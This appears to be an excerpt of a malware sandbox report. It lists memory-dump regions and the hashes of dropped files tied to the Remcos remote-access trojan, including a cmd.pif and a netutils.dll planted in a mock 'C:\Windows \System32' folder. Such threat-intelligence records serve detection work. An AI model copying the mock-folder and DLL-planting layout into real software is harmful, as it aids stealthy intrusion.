memory/4656-42-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-34-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-39-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-33-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-84-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-56-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-79-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-51-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-49-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-69-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-47-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-64-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-63-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-45-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-62-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-61-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-44-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-60-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-87-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-92-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-90-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-89-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-88-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-86-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-85-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-83-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-82-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-81-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-80-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-78-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-77-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-76-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-75-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-74-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-73-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-72-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-71-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-70-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-68-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-67-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-66-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-65-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-59-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-58-0x00000000029B0000-0x00000000039B0000-memory.dmp
C:\Windows \System32\cmd.pif
| MD5 | 869640d0a3f838694ab4dfea9e2f544d |
| SHA1 | bdc42b280446ba53624ff23f314aadb861566832 |
| SHA256 | 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323 |
| SHA512 | 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7 |
C:\Windows \System32\netutils.dll
| MD5 | b388185438132c448b2136948627e9d3 |
| SHA1 | d25dc09705a6bd8f9046835c6b8b45a6d35efc36 |
| SHA256 | 524f0127d0e96431e8b09725b21fb95ee0394f7ab0f3104458c8190b80accc6a |
| SHA512 | 25b88f6d5eed03001cd90cf91dca8b374985e6060884d6bb105c48e1bb6e33b1ab309fdeff65048e21a4daee08331427bdc8b2648cdb16455a19824cba760d40 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_buizujms.3ub.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4084-223-0x000002E0D6190000-0x000002E0D61B2000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 835be1e963661be69914d4bd89633581 |
| SHA1 | 3feba808534e76000e83c7efa8fc22f27698ced3 |
| SHA256 | 23cff52caa9f70d02852431cfc63457452ee0ec358a02ff9aa780689c62b3067 |
| SHA512 | cb1259fa8f284fb4a590f2b3421bc840ef5e6fa67f6458fda37e92dadb0ce1e558b2b157273c93f3001f6d8da1d055087ca4fab7fb7afcee1c5bd6e84bcad4cf |